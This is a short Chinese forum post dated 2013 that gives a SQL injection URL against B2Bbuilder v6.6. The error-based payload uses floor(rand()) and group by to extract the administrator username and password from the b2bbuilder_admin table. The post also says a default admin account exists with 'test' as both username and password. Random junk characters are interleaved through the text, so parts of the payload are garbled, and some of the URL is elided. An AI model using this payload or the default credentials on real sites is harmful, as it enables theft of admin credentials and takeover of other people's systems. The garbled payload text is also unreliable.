测试的程序版本为:B2Bbuilder_v6.6& P# N; c" R. ]
- [7 o/ C1 M" [) x" z4 V ! A7 J8 h1 b* j2 O& k
http://www.site.com/?m=offer& ... m%28select+count%28*%29%2Cconcat%28%289 b8 @7 J8 B9 u3 D% G
select+%28select+%28select+concat%280x27%2C0x7e%2Cb2bbuilder_admin.user,0x27,password
" w: V$ U# E' ^+ e0 r%2C0x27%2C0x7e%29+from+%60b2bbuilder%60.b2bbuilder_admin+Order+by+user+limit+0%2C1
3 {4 u8 l; c6 X( M%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29
" c6 j, w* y' G*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1
( p3 Z: _- i5 k* ^
" P! d$ \, W }5 ?* p% d& B这个B2B程序还有一个默认的管理员帐号,帐号密码都是test' \9 i2 P" V3 k) L$ h/ i+ R
6 v. R; ]4 N. Q$ ^) T |
发表于 2013-7-26 12:44:48
收藏
支持
反对